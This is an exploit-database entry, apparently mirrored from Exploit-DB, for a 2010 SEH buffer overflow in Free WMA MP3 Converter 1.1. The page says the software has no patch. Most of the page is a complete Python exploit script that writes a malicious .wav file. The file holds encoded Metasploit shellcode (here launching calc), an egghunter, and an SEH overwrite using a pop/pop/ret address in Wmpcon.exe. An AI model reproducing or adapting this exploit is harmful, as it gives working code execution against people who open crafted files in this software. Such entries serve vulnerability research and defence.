header-logo
Suggest Exploit
vendor:
Free WMA MP3 Converter
by:
Dr_IDE
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Free WMA MP3 Converter
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XPSP3
2010

Free WMA MP3 Converter 1.1 Buffer Overflow Exploit (SEH)

This is a buffer overflow exploit for Free WMA MP3 Converter version 1.1. The exploit code is designed to execute arbitrary code with the privileges of the application. The code is already injected with an egg to facilitate exploitation.

Mitigation:

The vendor has not released any official patch or mitigation for this vulnerability. It is recommended to avoid using this software or update to a newer version if available.
Source

Exploit-DB raw data:

#!/usr/bin/env python
##############################################################################
#
# Free WMA MP3 Converter 1.1 Buffer Overflow Exploit (SEH)
# Coded By:     Dr_IDE
# Date:         November 10, 2010
# Download:     http://www.eusing.com/free_wma_converter/mp3_wma_converter.htm
# Tested on:    Windows XPSP3
# Greets:       edb team
# Notes:	Egghunter was for fun, not required though.
#
###############################################################################

# windows/exec - 303 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, CMD=calc
# Egg is already injected
code=(
"\x80\x87\x78\x68\x80\x87\x78\x68\x89\xe1\xd9\xee\xd9\x71\xf4\x58\x50\x59"
"\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56"
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42"
"\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43"
"\x4a\x4a\x49\x4b\x4c\x4a\x48\x47\x34\x43\x30\x45\x50\x45\x50\x4c\x4b\x51"
"\x55\x47\x4c\x4c\x4b\x43\x4c\x45\x55\x42\x58\x45\x51\x4a\x4f\x4c\x4b\x50"
"\x4f\x45\x48\x4c\x4b\x51\x4f\x51\x30\x43\x31\x4a\x4b\x51\x59\x4c\x4b\x50"
"\x34\x4c\x4b\x43\x31\x4a\x4e\x46\x51\x49\x50\x4c\x59\x4e\x4c\x4d\x54\x49"
"\x50\x42\x54\x45\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x48\x42\x4a\x4b\x4c"
"\x34\x47\x4b\x50\x54\x47\x54\x45\x54\x43\x45\x4b\x55\x4c\x4b\x51\x4f\x47"
"\x54\x45\x51\x4a\x4b\x45\x36\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f\x45"
"\x4c\x43\x31\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4c\x49\x51"
"\x4c\x46\x44\x44\x44\x48\x43\x51\x4f\x50\x31\x4a\x56\x45\x30\x50\x56\x42"
"\x44\x4c\x4b\x51\x56\x50\x30\x4c\x4b\x51\x50\x44\x4c\x4c\x4b\x44\x30\x45"
"\x4c\x4e\x4d\x4c\x4b\x43\x58\x45\x58\x4b\x39\x4a\x58\x4d\x53\x49\x50\x42"
"\x4a\x50\x50\x43\x58\x4a\x50\x4d\x5a\x44\x44\x51\x4f\x45\x38\x4a\x38\x4b"
"\x4e\x4c\x4a\x44\x4e\x50\x57\x4b\x4f\x4d\x37\x42\x43\x43\x51\x42\x4c\x42"
"\x43\x43\x30\x41\x41")

eggy=(
"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
"\x80\x87\x78\x68\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")

nops=("\x90" * 8)
nseh=("\xEB\x06\x90\x90")
rseh=("\xEF\xF7\x4A\x00")			#Universal P/P/R - Wmpcon.exe		
buf1=("\x41" * 1000)
buf2=("\x42" * (4116 - len(buf1+nops+code)))
junk=("\x43" * (8000 - len(buf1+buf2+nseh+rseh)))

evil=(buf1+nops+code+buf2+nseh+rseh+nops+eggy+junk);

f1 = open('Dr_IDE.wav','w');
f1.write(evil);
f1.close();

#[http://pocoftehday.blogspot.com]